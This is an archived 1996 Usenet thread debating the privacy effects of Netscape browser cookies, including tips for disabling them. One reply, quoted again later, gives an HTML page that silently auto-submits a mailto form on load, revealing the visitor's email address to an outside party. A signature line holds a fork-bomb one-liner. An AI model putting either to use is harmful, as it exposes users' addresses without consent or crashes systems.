Netscape & Your Privacy
Murray Arnow
------------ TEXT ATTACHMENT --------
SENT 02-25-96 FROM GIBBS_JOANNE
The following is taken from the Saturday issue (2/24/96) of the
Austin American Stateman, Business section:
By Lee Gomes
Attention, web surfers: You'll probably be surprised to hear this,
but the Web sites you're visiting may be spying on you and using
your own computer's hard disk drive to keep detailed notes about
what they see.
A little-known feature of Netscape's Navigator, as well as other
World Wide Web browser programs, including Microsoft Corp.'s, allows
Web sites to store any information about your visit that they want
to by way of a file on your own hard drive. The file theoretically
can be up to 1.2 megabytes big - the size of a medium-size computer
program.
The feature is called "cookies," and while Netscape said the feature
has many legitimate uses, the company admitted its use could evolve
to pose serious questions involving privacy and other issues. In
response to queries Monday, the company said it is considering changing
the way the feature works.
"This is a very legitimate issue that people ought to know about," said
Len Feldman, a Netscape Communications Corp. product manager. "It's
certainly something for us to consider."
Cookies - the name is entirely whimsical - allows any Web site that so
wishes to store any sort of information they want about your visit, such
as what specific pages you looked at and how long you looked at them..
So far, very few Web sites are using the feature, although an industry
wide forum is on the verge of standardizing the cookies technology.
It does not mean Netscape monitors every step a user takes. Instead,
a company with a Web site, for example, could monitor a person's use
while on that individual site.
Web sites store the information by way of a file called "cookies.txt"
on Windows machines and "MagicCookie" on the Macinstosh. The information
usually resides in the same directory as the Navigator program. These
are standard text files that can be read using any word-processing program.
Once the inforation is stored, the site will know you have been there
before; it may also have an indication of what your interests are.
Because of the way that connections are made on the Internet, cookies
will not tell a Web site your name or address - only that you, or
someone using your computer, had visited the site before, along with
whatever other information it wishes.
Of course, it stores this information if you voluntarily "registered" at
the site, giving it your name and address. From then on, all of your
comings and goings could be recorded and linked to you, specifically -
even if on a subsequent visit you do not sign in using your name. That
information, in turn, could be sold to others, such as consumer marketing
organizations.
Even while cookies doesn't explicitly betray your identity, the feature
seems to violate two nearly universal assumptions held by computer users:
One is that exploring the World Wide Web is an entirely confidential and
anonymous experience that leaves no record of itself. The other is that
users' hard disk drives are, in effect, their castles, and shouldn't be
tampered with - without an owner's explicit knowledge and approval.
Cookies is built into browsers and cannot be turned off. While deleting
the cookes file on your computer will erase any information that's been
stored there, if in your next session with the browser a site wants to store
information, it will simply create a new cookies file.
Feldman said cookies was designed to allow information to last from one Web
visit to the next, something that is now impossible because of the way the
Internet is set up.
That capability would have many legitimate uses on the Web. For example, the
Internet version of the Microsoft Network relies on cookies to allow users
to customize the "home page" they first see when they visit the site
with various stock quotes and the like.
Feldman said, though, that the use of cookies has grown without the company
going back to consider some of the privacy and related questions that are
raised - especially since most browser users probably don't even know the
feature exists. One possible solution, he said, would be to allow cookies
to be turned off, on a permanent or per session basis, by users via the
program's "options" menu.
Feldman said that Netscape's software prevents one Web site from seeing the
cookies information stored by anther Web site - for example, competitors
looking to see what a rival had stored. But he said it is technically
possible, although difficult, for one Web site to pretend it is another
site and therefore get access to information.
Copied By: GIBBS_JOANNE @AUSTIN
SENT: 96-02-25 16:41
FROM: GIBBS_JOANNE
TO: DL.USERS @AUSTIN
SUBJECT: ! Netscape users - read attached !
Thomas Ptacek [tQbF]
>Attention, web surfers: You'll probably be surprised to hear this,
>but the Web sites you're visiting may be spying on you and using
>your own computer's hard disk drive to keep detailed notes about
>what they see.
[ lots of stuff omitted ]
I fail to see what the privacy issue is here. The only problem I have with this is that
Netscape is essentially caching information about my HTTP transactions on my hard drive, thus
sucking up a little extra space.
It is a reasonable assumption that regardless of what browser you're using, any transaction
you complete with any HTTP server can be logged, parsed, added to databases, or given to the
FBI. It doesn't take extra support in the form of "Magic Cookies" to accomplish this. As it
stands, the web sites you're talking to already know what IP address you're coming from and
what pages you've accessed. By their very nature, every form you fill out on a website at
least temporarily stores it's input; it's trivial to log and save this information.
I can't believe people are making a privacy concern over the fact that this "cookie" file
stores things like your name and address (if you've entered it into a form)... what do they
think happens to that information when you're not using cookie-supporting browsers? Does it
just go away?
Of course not. It'd be pointless to collect such information and throw it away. If you're
concerned about your identity being disclosed over the Internet, don't bitch about innocuous
features in browsers. Just don't enter your real name into a form.
Duh?
----------------
Thomas Ptacek at EnterAct, L.L.C., Chicago, IL [tq...@enteract.com]
----------------
main(){while(1)fork;}
Alex Strasheim
>seems to violate two nearly universal assumptions held by computer users:
Cookies don't tell the web site who you are.
>One is that exploring the World Wide Web is an entirely confidential and
>anonymous experience that leaves no record of itself.
This isn't a problem with cookies. It's a problem with users not
understanding the technology. People ought to think about privacy, and
they ought to avoid making bad assumptions. There is absolutely no
reason for people to believe that web browsing is anonymous.
If you have static IP, they don't need cookies to keep track of you --
every transaction you make with a web server (and most other servers as
well) is logged with your IP address.
If you guys want something to bitch about, don't worry about cookies.
Here's something better for you:
--
<HTML>
<HEAD>
</HEAD>
<BODY onLoad="document.mailme.submit()">
<form method=post name="mailme"
action="mailto:re...@simenon.popco.com?subject=scammed address">
<h3>Viewing this page automatically submits email to an
address which then sends you back email to prove it grabbed the
message.</h3>
<input type=hidden name="scammed.the.address" value="did it">
</form>
</BODY>
</HTML>
--
This page will automatically send mail from your browser when you load it,
and that will have your return address on it. What's more, they can
cause you to send threatening mail to someone, etc., without your
knowledge. You probably wouldn't even know that any mail had gone out at
all.
The only fix at this point is to keep your netscape email address
unconfigured.
Jason Prost
> >but the Web sites you're visiting may be spying on you and using
> >your own computer's hard disk drive to keep detailed notes about
> >what they see.
>
>
> I fail to see what the privacy issue is here. The only problem I have with this is that
> Netscape is essentially caching information about my HTTP transactions on my hard drive, thus
> sucking up a little extra space.
I would agree and go a step further to point out that Netscape and every other browser uses
your hard drive to cache the images/text/audio/movies that you happen to hit...the cache
directory is usually far larger than 1.2 megs...
> It is a reasonable assumption that regardless of what browser you're using, any transaction
> you complete with any HTTP server can be logged, parsed, added to databases, or given to the
> FBI. It doesn't take extra support in the form of "Magic Cookies" to accomplish this. As it
> stands, the web sites you're talking to already know what IP address you're coming from and
> what pages you've accessed. By their very nature, every form you fill out on a website at
> least temporarily stores it's input; it's trivial to log and save this information.
agreed and with the advent of Java and JavaScript it is possible to extract any information
that is contained within Netscapes configuration files (i.e. your email address, name, etc...)
I think that if it really was to pose some sort of "privacy" issue all netscape would have to
include within their browser is an "on/off" switch for cookies...not hard, they've alrady got
it for caching...
later...
jason...
[ jason prost ]
[ programmer / engineer ]
[ http://www.synet.net - internet solutions ]
Billy Kennedy
they send the check on time ;-)
Bob Zimmerman
>Fri, 01 Mar 96 13:51:46 GMT mar...@wwa.com:
>>Attention, web surfers: You'll probably be surprised to hear this,
>>but the Web sites you're visiting may be spying on you and using
>>your own computer's hard disk drive to keep detailed notes about
>>what they see.
>
>[ lots of stuff omitted ]
>
>I fail to see what the privacy issue is here. The only problem I have with this is that
>Netscape is essentially caching information about my HTTP transactions on my hard drive, thus
>sucking up a little extra space.
>
I have heard the cookie feature mis-represented to the extent, that it can be
used to "search" someones hard drive... Unbelievable how mangled this feature
has been portrayed.
In reality... storing these settings in the browser is no different then an
INI file or registery... the only difference is the web server (cgi) is
specifying what the keys/values are.
I guess to this extent I am not sure what down side this represents other then
it provides the ability to make for a much friendlier site.
For an internal news (coroporate) system... I have used it to generate an HTML
What's New page with exactly "what has changed" since you last were there and
links to the exact pages... You can reset the last date here etc...
It really was handy for this purpose. I can think of dozens of other
practical uses...
-----
Bob Zimmerman ~ bob...@metaworld.com ~ http://www.metaworld.com
MetaWorld, Inc ~ PO Box 261 ~ Grayslake, IL 60030
in...@metaworld.com ~ (708) 223-6753 ~ Fax: (708) 223-2096
Working with change...
Providing Business Solutions for Tomorrow... Today!
Judith Nicholls
Thomas Ptacek [tQbF]
identically detailed information about you in their log files.
James Kita
>
> >Yep. There it is. cookies.txt. Four companies have entries in my file, including
> >netscape.com.
>
> Yippy-skippy. Most of the web sites you've visited probably have
> identically detailed information about you in their log files.
On and on.
Let me also point out that even more information is "chached" on you
every time you go to the grocery store, video store software store
or use your credit card.
The only redeeming point is that marketing people are interseted in
so much information about what you do, that they don't really stop
to look at the details.
Welcome to the computer age.
Jim
Murray Arnow
_____________________________________________________________________________
...........................Meantime, here is a way to thwart it for
Windows users, courtesy John Navas of modem FAQ fame, in a posting to
ba.internet and below that a Mac remedy from Barry Twycross posting
also in ba.internet:
==========================================================
Path:
nntp.crl.com!howland.reston.ans.net!vixen.cso.uiuc.edu!newsfeed.intern
etmci.com!news.exodus.net!news.aimnet.com!news
From: JNa...@NavasGrp.com (John Navas)
Newsgroups: ba.internet
Subject: Re: Web Browser "Cookies" #1
Date: Wed, 28 Feb 1996 20:42:31 GMT
Organization: The Navas Group of Dublin, CA, USA
Lines: 50
Message-ID: <4h2em5$3...@news.aimnet.com>
References: <378.40...@grape.net>
NNTP-Posting-Host: dial-bp1-12.iway.aimnet.com
X-Newsreader: Forte Free Agent 1.0.82
[Posted to ba.internet]
orion...@grape.net (Orion Hill) wrote:
>The following article should be of interest to anyone using or thinking
>of using a World Wide Web browser.
>WEB "COOKIES" MAY BE SPYING ON YOU
>By Lee Gomes, San Jose Mercury News Staff Writer
>...
>Cookies are built into browsers and cannot be turned off. While
>deleting the cookies file on your computer will erase any information
>that's been stored there, if in your next session with the browser a
>site wants to store information, it will simply create a new cookies
>file.
While the privacy and security concerns over "cookies" are valid, this
statement may not be (at least in the Windows versions of Navigator 1.22).
Here's what I have done, which seems to be successful (at least thus far):
1. Edit your COOKIES.TXT file down to:
---cut-here-----------------------------------------------------
MCOM-HTTP-Cookie-file-1
---cut-here-----------------------------------------------------
2. Change the file attributes of your COOKIES.TXT file to Read Only:
3. Shut off cookies in Navigator:
a. With the 16-bit Navigator (Windows 3.xx), change the following
in NETSCAPE.INI from:
[Cookies]
Cookie File=[path]cookies.txt
to:
[Cookies]
Cookie File=NUL
b. With the 32-bit Navigator (Windows 95), use the Registry Editor
to change:
[HKEY_USERS\.Default\Software\Netscape\Netscape Navigator\Cookies]
"Cookie File"="[path]Cookies.txt"
to:
[HKEY_USERS\.Default\Software\Netscape\Netscape Navigator\Cookies]
"Cookie File"="NUL"
--
Best regards,
John mailto:JNa...@NavasGrp.com http://web.aimnet.com/~jnavas/
=====================================================
It may have wrapped on your screen, so allow for that! All the
material between brackets he had on one line.
You use this information and what follows AT YOUR OWN RISK!
Here is a follow-up posting for a Mac remedy:
=====================================================
Path:
nntp.crl.com!pacbell.com!ames!bart.starnet.com!ns2.mainstreet.net!news
netgate.net!d16.netgate.net!user
From: Ba...@netbox.com (Barry Twycross)
Newsgroups: ba.internet
Subject: Re: Web Browser "Cookies" #1
Date: Wed, 28 Feb 1996 19:14:56 -0800
Organization: Me
Lines: 51
Message-ID: <Barry-28029...@d16.netgate.net>
References: <378.40...@grape.net> <4h2em5$3...@news.aimnet.com>
NNTP-Posting-Host: d16.netgate.net
X-Newsreader: Yet Another NewsWatcher 2.1.5
In article <4h2em5$3...@news.aimnet.com>, JNa...@NavasGrp.com (John
Navas) wrote:
> [Posted to ba.internet]
> orion...@grape.net (Orion Hill) wrote:
>
> >The following article should be of interest to anyone using or thinking
> >of using a World Wide Web browser.
>
> >WEB "COOKIES" MAY BE SPYING ON YOU
> >By Lee Gomes, San Jose Mercury News Staff Writer
>
> >...
>
> >Cookies are built into browsers and cannot be turned off. While
> >deleting the cookies file on your computer will erase any information
> >that's been stored there, if in your next session with the browser a
> >site wants to store information, it will simply create a new cookies
> >file.
>
> While the privacy and security concerns over "cookies" are valid, this
> statement may not be (at least in the Windows versions of Navigator
1.22).
> Here's what I have done, which seems to be successful (at least thus
far):
[how to do it under windows snipped]
On the Mac (Netscape 2.0) it says:
--------
# Netscape HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This is a generated file! Do not edit.
netscape.com TRUE / FALSE 946684799 NETSCAPE_ID c65ffb1e,c60c9bd1
--------
I wonder what netscape are saying.
I thought I'd try disabling it anyway.
You find it inside the "Netscape Ÿ" folder inside the "Preferences" folder
inside you system folder. It's called "MagicCookie". I opened it woth word
(any text editor should do it seems to be a text file), selected
everything, deleted it, then saved the file.
Then I locked the empty file. (CheckBox at the bottom of the Get Info
box.)
--
Barry
Ba...@netbox.com http://www.netbox.com/barry>
------
Posted under the restrictions imposed by the US government.
Peter W
>>but the Web sites you're visiting may be spying on you and using
>>your own computer's hard disk drive to keep detailed notes about
>>what they see.
>
>
>I fail to see what the privacy issue is here. The only problem I have with this is that
>Netscape is essentially caching information about my HTTP transactions on my hard drive, thus
>sucking up a little extra space.
>
>you complete with any HTTP server can be logged, parsed, added to databases, or given to the
>FBI. It doesn't take extra support in the form of "Magic Cookies" to accomplish this. As it
>stands, the web sites you're talking to already know what IP address you're coming from and
>what pages you've accessed. By their very nature, every form you fill out on a website at
>least temporarily stores it's input; it's trivial to log and save this information.
If you're using a proxy server, as with AOL or in most corporate LANs,
the IP is meaningless as it is the same for MANY different people.
If the web server sits behind a firewall and does not see the original
IP, cookies are about the only way short of passwords to track folks.
Cookies at least tie it to one machine (which is not the same as one
person unless you only surf from one machine, using one browser...)
--
----------------------------------------------------------------
- OS/2 Warp * pet...@mcs.net * Linux/X-Windows -
- Technology is only as good as the good it does. -
----------------------------------------------------------------
Peter W
>> >but the Web sites you're visiting may be spying on you and using
>> >your own computer's hard disk drive to keep detailed notes about
>> >what they see.
>>
>>
>> It is a reasonable assumption that regardless of what browser you're using, any transaction
>> you complete with any HTTP server can be logged, parsed, added to databases, or given to the
>> FBI. It doesn't take extra support in the form of "Magic Cookies" to accomplish this. As it
>> stands, the web sites you're talking to already know what IP address you're coming from and
>> what pages you've accessed. By their very nature, every form you fill out on a website at
>> least temporarily stores it's input; it's trivial to log and save this information.
>
>that is contained within Netscapes configuration files (i.e. your email address, name, etc...)
>
I would love to see a demo of getting such info via _Java_.
Yes, you can use LiveScript --oops, make that "Java"Script"--
to do some such stuff, but _Java_ *applets* ???
the longer this LiveSript privacy-hole-a-rama goes on, the more
obvious it is that Sun made a big mistake in letting Netscape
rename LiveScript...
*There is no relationship between Java and Live(Java)Script.*
A. Chandler Collins
Except that when you enter a store physically you are not required,
nor asked, to hand over ID. I have no problem with some place getting
my info if I buy something or even ask for information, but it seems
to me that this is the equivalent of searching people at the door.
Site admins have every *right* to do it, of course, but I wouldn't say
it bodes well for an open internet community.
-Chandler
chan...@spss.com
Bob Zimmerman
>In article <slrn4jm3d...@enteract.com>,
>Thomas Ptacek [tQbF] <tq...@enteract.com> wrote:
>>3 Mar 1996 22:42:58 -0600 pet...@MCS.COM:
>>>If you're using a proxy server, as with AOL or in most corporate LANs,
>>>the IP is meaningless as it is the same for MANY different people.
>>
>>You're missing my point, which is simply that "surfing the web" is not,
>>and never has been, an anonymous activity.
>>
>>----------------
>>Thomas Ptacek at EnterAct, L.L.C., Chicago, IL [tq...@enteract.com]
>>----------------
>>main(){while(1)fork;}
>
>Nor, IMHO, should it be. The content you are being provided is being done
>by someone else at considerable cost, and if you visit there, they have
>every right to know you were present (and looking).
>
>Access to someone else's web content is not a public right, nor is it
>something which you should expect to be able to do without anyone knowing
>about it.
I don't think that is a reasonable expectation (not that I disagree with the
point)... With dynamic IP addresses and ISP providers providing the web
server... you might look at it as an Art institute or a library...
Anyone can come in as long as they play by the rules...
If you wanted to enforce checking of IDs at the door, then you would somehow
have to restrict people with dynamic IPs from accessing the pages...
If you run your own web server, you have more control over access etc... but
once you open it up to the public, I don't think expecting to know who is
perusing is practical...
Jeff Stenger
>>Even while cookies doesn't explicitly betray your identity, the feature
>>seems to violate two nearly universal assumptions held by computer users:
>Cookies don't tell the web site who you are.
{section deleted}
>If you guys want something to bitch about, don't worry about cookies.
>Here's something better for you:
>--
><HTML>
><HEAD>
></HEAD>
><BODY onLoad="document.mailme.submit()">
><form method=post name="mailme"
> action="mailto:re...@simenon.popco.com?subject=scammed address">
><h3>Viewing this page automatically submits email to an
>address which then sends you back email to prove it grabbed the
>message.</h3>
><input type=hidden name="scammed.the.address" value="did it">
></form>
></BODY>
></HTML>
>--
>This page will automatically send mail from your browser when you load it,
>and that will have your return address on it. What's more, they can
>cause you to send threatening mail to someone, etc., without your
>knowledge. You probably wouldn't even know that any mail had gone out at
>all.
I tried this and it works great. It makes sense to me except the
"<input type..." line. What do the parameters "hidden name" and
"value" do? The body of the e-mail appears as
"scammed.the.address=did+it". Why? Thanks.
Jeff
Tom E. Arnold
>lots of stuff omitted from a text file about Netscape cookies
Microsoft Word Internet Assistant does something much more interesting on
your harddrive. If you use it to open thisfile.htm it creates
~hisfile.htm, hidden,readonly, containing the registration identity off
your (it BETTER be your) copy of Word. No doubt as to what this is for.
TEA/